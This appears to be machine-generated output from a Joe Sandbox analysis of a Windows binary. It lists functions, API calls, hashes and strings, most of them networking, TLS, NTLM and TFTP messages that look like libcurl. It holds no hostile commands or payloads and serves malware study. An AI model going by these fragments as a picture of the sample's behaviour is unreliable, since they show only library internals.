    • String ID: %s$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Expect$Expect:$Failed sending POST request$Failed sending POST request
    • API String ID: 1951014933-28685619
    • Opcode ID: 171202b4b8bb00c834428f014ae32a9f1b964a2a4c675aeb96a654aa13b3983a
    • Instruction ID: 276c1a727abb33aafa51d1100a719ac6d972f13d1625fc8809455120bd479db3
    • Opcode Fuzzy Hash: 171202b4b8bb00c834428f014ae32a9f1b964a2a4c675aeb96a654aa13b3983a
    • Instruction Fuzzy Hash: FFA1BC70E04318EBDB14DB94C886BEDB7B2AF44314F14C2A8E529AB382D7759B85DF50
    Function 006B0AD0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 171encryptionCOMMON
    Download Yara Rule
    APIs
    • CertGetNameStringA.CRYPT32(00000000,00000006,00010000,00000000,00000000,00000000), ref: 006B0B3C
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 006B0CBE
    • schannel: CertGetNameString() returned no certificate name information, xrefs: 006B0B52
    • <, xrefs: 006B0CB4
    • schannel: server certificate name verification failed, xrefs: 006B0CD7
    • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 006B0C6D
    • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 006B0C4B
    • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 006B0BC8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CertCheckNameStackStringVars@8_strlen
    • String ID: <$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
    • API String ID: 454863901-1025306730
    • Opcode ID: 143b828e81231e633e6801ab6eed002529888e3be87fc8a17c8e48b64ac58488
    • Instruction ID: 80bf0cffd50074c28d8799db1a0760df450abb89990cf96858c81a45ef2a09c1
    • Opcode Fuzzy Hash: 143b828e81231e633e6801ab6eed002529888e3be87fc8a17c8e48b64ac58488
    • Instruction Fuzzy Hash: 3B611AF1D00209EFEB44DF94C846BEFBBB6AF48304F108659E514BB240D775AA85CB95
    Function 006ACC90 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 161COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 006ACE2A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006ACECA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s$%s%02x%02x$CNAME: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $TTL: %u seconds$v$xvp
    • API String ID: 3286693010-2184722941
    • Opcode ID: 6ad73c3f6eecfa0db97295174f67a11bca6d8e11704f4a52f9bf92fd54f0a1cc
    • Instruction ID: cb1f64864b2cf80746dd3f51debec2cf9040a3bd417207c03a6675724ebe45f4
    • Opcode Fuzzy Hash: 6ad73c3f6eecfa0db97295174f67a11bca6d8e11704f4a52f9bf92fd54f0a1cc
    • Instruction Fuzzy Hash: 4B616EB5E04218AFCB14DF58C891BADB7B6FF86304F10C1A9E4095B282D775AE85CF91
    Function 006A4D60 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 137COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: NTLM$NTLM$NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected$?g$?g
    • API String ID: 4218353326-1235922430
    • Opcode ID: 3f060a6e3d495b26cc41a77d4464020f931679497c9895d917d969a90a0ec01a
    • Instruction ID: 74905ee81d2fd278c82fb2442e36c92d0724c4cdf9672bf90935b26532819041
    • Opcode Fuzzy Hash: 3f060a6e3d495b26cc41a77d4464020f931679497c9895d917d969a90a0ec01a
    • Instruction Fuzzy Hash: F8516DF4A00249AFDB04EF54CC51AAE7BB2BF86305F144068E8159B341E7B5EE50CFA1
    Function 006E0E53 Relevance: 16.9, APIs: 11, Instructions: 374COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 0346f03d68d41d5866db273b9a4a4be0d65601a1e54cdd7fd82286ca5d13a027
    • Instruction ID: c9e1c965e542bfbb2ef30eb697d31ca750799f1315be9d070388825f5367d3c6
    • Opcode Fuzzy Hash: 0346f03d68d41d5866db273b9a4a4be0d65601a1e54cdd7fd82286ca5d13a027
    • Instruction Fuzzy Hash: 82C14572D40244AFDB60DBA8DC82FDEB7F9AF09B04F144169FA05FB382D67099419B64
    Function 006630B0 Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 481networkCOMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066372C
      • Part of subcall function 0066D3E0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0067E522,?), ref: 0066D412
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D434
      • Part of subcall function 0066D3E0: __allrem.LIBCMT ref: 0066D454
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D477
      • Part of subcall function 0066D3E0: @_RTC_CheckStackVars@8.LIBCMT ref: 0066D4E3
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • WSASetLastError.WS2_32(00000000), ref: 00663520
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006635BF
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • Connection time-out, xrefs: 00663161
    • Failed to connect to %s port %ld: %s, xrefs: 006636F8
    • connect to %s port %ld failed: %s, xrefs: 0066357E
    • Connection failed, xrefs: 006634CF
    • L', xrefs: 0066328E
    • After %I64dms connect time, move on!, xrefs: 0066327D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$Unothrow_t@std@@@__ehfuncinfo$??2@$_strlen$CounterErrorLastPerformanceQuery__allrem
    • String ID: After %I64dms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$L'$connect to %s port %ld failed: %s
    • API String ID: 3383922131-68081636
    • Opcode ID: fca23368ddbf0aff51ed7b680e307e90d80d31526b4715accd9d0b0e40860427
    • Instruction ID: 51ffbb5e5aea5833fa2ae2cceb1deea8be4e399b6a412afcc0b271de4910d486
    • Opcode Fuzzy Hash: fca23368ddbf0aff51ed7b680e307e90d80d31526b4715accd9d0b0e40860427
    • Instruction Fuzzy Hash: 6B224D74A00218EFDB54DF58D885BEDBBB2BF49314F1481A9E9099B341D735AE81CF90
    Function 0067C070 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 435COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: $%02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$;$<$F
    • API String ID: 1951014933-625890780
    • Opcode ID: 01aa9424150ee9a1a665d588d34ca9ca816830047ec451a17fae715b275b618c
    • Instruction ID: 9e96600507ce5407847db4caf5abf3b3ac45c5819391b66d4cd25923efa19046
    • Opcode Fuzzy Hash: 01aa9424150ee9a1a665d588d34ca9ca816830047ec451a17fae715b275b618c
    • Instruction Fuzzy Hash: E51217B0D00619CBDF24CFA8D8507EDBBB2AF45334F24826EE469A7291D7309A81CF51
    Function 00667430 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 432networkCOMMON
    Download Yara Rule
    APIs
    • select.WS2_32(FFFFFFFE,00000000,00000000,00000000,?), ref: 00667907
    • WSAGetLastError.WS2_32 ref: 0066792A
    • __WSAFDIsSet.WS2_32(00000000,00000000), ref: 00667A74
    • __WSAFDIsSet.WS2_32(00000000,00000000), ref: 00667AB2
    • __WSAFDIsSet.WS2_32(00000000,00000000), ref: 00667AEE
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00667B4E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8select
    • String ID: @$@$@
    • API String ID: 1206456650-1177533131
    • Opcode ID: 33df4ed2c9c4a8f5231200815412bcaf58306d977e8d84244947b242bd133fd7
    • Instruction ID: 200b6f0e7ca2a8bee2090cfba1f4247083c6e1f92b8358342ef9fb765352d950
    • Opcode Fuzzy Hash: 33df4ed2c9c4a8f5231200815412bcaf58306d977e8d84244947b242bd133fd7
    • Instruction Fuzzy Hash: F322F974904218DBDB6ACF18C895BA9B7BAFB48318F1082D9E459A7351D731AFD1CF80
    Function 006980C0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 398COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00683780: @_RTC_CheckStackVars@8.LIBCMT ref: 00683995
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006985A0
    Strings
    • Request has same path as previous transfer, xrefs: 00698566
    • Uploading to a URL without a file name!, xrefs: 00698461
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
    • API String ID: 930174750-131330169
    • Opcode ID: 40bee42b9f5ddae507ec9103cda53aeb05d2dad3b20a8b944f5689a3e20d78ed
    • Instruction ID: 497f6b7e4ed32997951a845314bc31926d22a2c4995f8d07a01ac74f37e49852
    • Opcode Fuzzy Hash: 40bee42b9f5ddae507ec9103cda53aeb05d2dad3b20a8b944f5689a3e20d78ed
    • Instruction Fuzzy Hash: C5F154B0E002189FCF14DF98D885BEEB7B6BF49304F148169E9156B341DB35AE86CB91
    Function 00689960 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 300networkCOMMON
    Download Yara Rule
    APIs
    • htons.WS2_32(?), ref: 00689A65
    • htons.WS2_32(?), ref: 00689A83
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00689D5F
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    • Sending data failed (%d), xrefs: 00689D44
    • Sending data failed (%d), xrefs: 00689CCC
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Stackhtons$CheckFailureVars@8
    • String ID: Sending data failed (%d)$Sending data failed (%d)
    • API String ID: 2853669374-2562922721
    • Opcode ID: 69d63edbdecc276c8897a80854ac7a3974d69c19c9c3db66a11fa86ccc913722
    • Instruction ID: 8f7c02e11469170e0a8a163efdec300f3e57739c69665109a9c666b6a7e51aba
    • Opcode Fuzzy Hash: 69d63edbdecc276c8897a80854ac7a3974d69c19c9c3db66a11fa86ccc913722
    • Instruction Fuzzy Hash: 2ED1F974A152949FCB08DB98D891EEFB7B3BF84344F1843A8F8056B391D771A841CB94
    Function 006640C0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 198networkCOMMON
    Download Yara Rule
    APIs
    • getpeername.WS2_32(0065A2D0,?,00000080), ref: 00664142
    • WSAGetLastError.WS2_32 ref: 00664155
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00664339
    Strings
    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00664310
    • getsockname() failed with errno %d: %s, xrefs: 0066421E
    • getpeername() failed with errno %d: %s, xrefs: 0066418B
    • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0066428A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8getpeername
    • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
    • API String ID: 1334586172-670633250
    • Opcode ID: 803975fc8344bf724deba68754fd1f04b2b4d30c7024c4d0cb9201f9ac8d8fdb
    • Instruction ID: 8346e64ade3560fcc708c134eab3f22092673243b1b28fcb6a2cba8a7cfdf492
    • Opcode Fuzzy Hash: 803975fc8344bf724deba68754fd1f04b2b4d30c7024c4d0cb9201f9ac8d8fdb
    • Instruction Fuzzy Hash: 5061B5B2A00214AFDB54EB54EC52FEE777BAF45304F40819CF949AB242DE349E448BE5
    Function 00678550 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 163COMMON
    Download Yara Rule
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006785A8
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006785ED
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678670
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006786A2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--$c
    • API String ID: 885266447-2082138188
    • Opcode ID: 5f57c6a91b7083e0c2feb8e29cea50f68c3a64540e095daf9306c33f57b8cde2
    • Instruction ID: c9bea1799973bde1300ecff77c881a5f8c2dd742adf8e2b9c88db63aae0b674d
    • Opcode Fuzzy Hash: 5f57c6a91b7083e0c2feb8e29cea50f68c3a64540e095daf9306c33f57b8cde2
    • Instruction Fuzzy Hash: BE5111B5E40209FFDB54DFACCC45FEE77BAAB88700F108519F618AB291D6749A408B94
    Function 006D8C49 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 006D8C5F
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006D8C6B
    • _free.LIBCMT ref: 006D8C76
    • _free.LIBCMT ref: 006D8C81
    • _free.LIBCMT ref: 006D8C8C
    • _free.LIBCMT ref: 006D8C97
    • _free.LIBCMT ref: 006D8CA2
    • _free.LIBCMT ref: 006D8CAD
    • _free.LIBCMT ref: 006D8CB8
    • _free.LIBCMT ref: 006D8CC6
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 725d41d0647ac7419f5c189804b3d244c413b98505ff83601b06b71954daf3e2
    • Instruction ID: e42b08bb33b5af5a9a5e0c66b936f1f7f7eadc575c9ab2c1133c694617ada113
    • Opcode Fuzzy Hash: 725d41d0647ac7419f5c189804b3d244c413b98505ff83601b06b71954daf3e2
    • Instruction Fuzzy Hash: 72219676D44108AFCB41EFA4C985DDEBBBABF08780B0041AAF5159B221DB71EA44CFC4
    Function 0066AB30 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 438COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066B06B
    Strings
    • select/poll returned error, xrefs: 0066ABFD
    • transfer closed with %I64d bytes remaining to read, xrefs: 0066AFB4
    • Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received, xrefs: 0066AEBD
    • Done waiting for 100-continue, xrefs: 0066AD9A
    • transfer closed with outstanding read data remaining, xrefs: 0066AFF4
    • *, xrefs: 0066ADBB
    • Operation timed out after %I64d milliseconds with %I64d bytes received, xrefs: 0066AF2A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: *$Done waiting for 100-continue$Operation timed out after %I64d milliseconds with %I64d bytes received$Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received$select/poll returned error$transfer closed with %I64d bytes remaining to read$transfer closed with outstanding read data remaining
    • API String ID: 930174750-1497102274
    • Opcode ID: 6c28047f403184082d0b5d14bca5163aa57863df97f1352fd447c872b322009a
    • Instruction ID: 8d740f4a1767caafeff7c16cb68996183c0004f4098219e7a728d5f1ece7303a
    • Opcode Fuzzy Hash: 6c28047f403184082d0b5d14bca5163aa57863df97f1352fd447c872b322009a
    • Instruction Fuzzy Hash: 5C12FF75A00208DFDB04DF98C595AAAB7B2FF88314F24C199E8199B356D731ED82CF91
    Function 006A42B0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 357COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A472E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: $ $default$login$machine$machine$password
    • API String ID: 930174750-1990327166
    • Opcode ID: 113d9a784e48c2f08acf5ea7fb14aad15223fe1320f165e8d4809dc39f54a0c4
    • Instruction ID: d3d0b6deede4288c470d353a79ef2165f1c6f790afbc9ea4e97c46d91e727720
    • Opcode Fuzzy Hash: 113d9a784e48c2f08acf5ea7fb14aad15223fe1320f165e8d4809dc39f54a0c4
    • Instruction Fuzzy Hash: CBE18FB0D04259CBDF10EFA8DC457EEBBB2AF86305F044059E81567281DBB59E84CFA2
    Function 0068BAA6 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 262networkCOMMON
    Download Yara Rule
    APIs
    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 0068BB91
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068BBB5
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,00664304,?,?,00000080), ref: 006A593A
      • Part of subcall function 006A5920: _strncpy.LIBCMT ref: 006A598E
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A06
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A2E
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,?,?,?,?,?,?,00664304), ref: 006A5A68
      • Part of subcall function 006A5920: SetLastError.KERNEL32(00000080,?,?,?,?,?,?,?,00664304), ref: 006A5A80
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 0068BD69
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068BD8D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068BF97
    Strings
    • 7, xrefs: 0068BBDD
    • tftp_tx: giving up waiting for block %d ack, xrefs: 0068BB3E
    • Received ACK for block %d, expecting %d, xrefs: 0068BB08
    Memory Dump Source
